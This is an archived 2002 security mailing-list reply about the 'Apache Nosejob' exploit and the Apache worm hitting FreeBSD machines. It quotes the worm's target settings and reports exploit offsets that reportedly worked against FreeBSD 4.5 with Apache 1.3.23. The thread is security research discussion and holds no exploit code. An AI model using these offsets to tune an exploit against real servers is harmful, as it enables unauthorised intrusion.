Re: Follow up:Apache Nosejob
From: Craig (Leusent@typeoneg.net)Date: 08/22/02
- Previous message: Darroch: "Re: Follow up:Apache Nosejob"
- In reply to: Jeremy Junginger: "Follow up:Apache Nosejob"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: Craig <Leusent@typeoneg.net> To: pen-test@securityfocus.com, vuln-dev@securityfocus.com Date: Thu, 22 Aug 2002 17:59:09 -0400
On August 22, 2002 01:15 pm, you wrote:
> After perfiorming some research, I noticed that the apache worm that is
> plaguing FreeBSD machines uses the following settings (please correct me
> if I'm wrong):
>
> FreeBSD 4.5 x86 / Apache/1.3.20 (Unix):
> D=-146,
> B= 0xbfbfde00,
> R= 6
> Z= 36
>
> FreeBSD 4.5 x86 / Apache/1.3.22-24 (Unix)
> D=-134
> B= 0xbfbfdb00
> R= 3
> Z=36
After viewing the source code for the apache worm, I did some playing around
with the offsets, and I found that the following offsets seemed to work on
FreeBSD 4.5 w/apache 1.3.23 quite effectively.
-b 0xbfbfdc00
-d -134
-r 3
-z 36
Hope this helps,
Craig Holmes
- Previous message: Darroch: "Re: Follow up:Apache Nosejob"
- In reply to: Jeremy Junginger: "Follow up:Apache Nosejob"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
